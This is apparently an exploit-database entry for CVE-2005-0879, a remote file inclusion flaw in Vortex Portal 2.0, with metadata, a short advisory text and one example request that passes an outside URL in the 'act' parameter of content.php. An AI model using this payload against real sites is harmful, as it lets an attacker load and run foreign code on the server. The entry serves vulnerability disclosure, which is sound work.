Vortex Portal 2.0 - 'content.php?act' Remote File Inclusion

Author: Francisco Alisson
type: webapps
platform: php
port: 
date_added: 2005-03-23  
date_updated: 2013-05-06  
verified: 1  
codes: CVE-2005-0879;OSVDB-14958  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 25261.txt  
source: https://www.securityfocus.com/bid/12878/info

Vortex Portal is reportedly affected by a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user supplied input.

It is conjectured this vulnerability affects the latest release of Vortex Portal, version 2.0.

http://www.example.com/content.php?act=http://www.example.com/file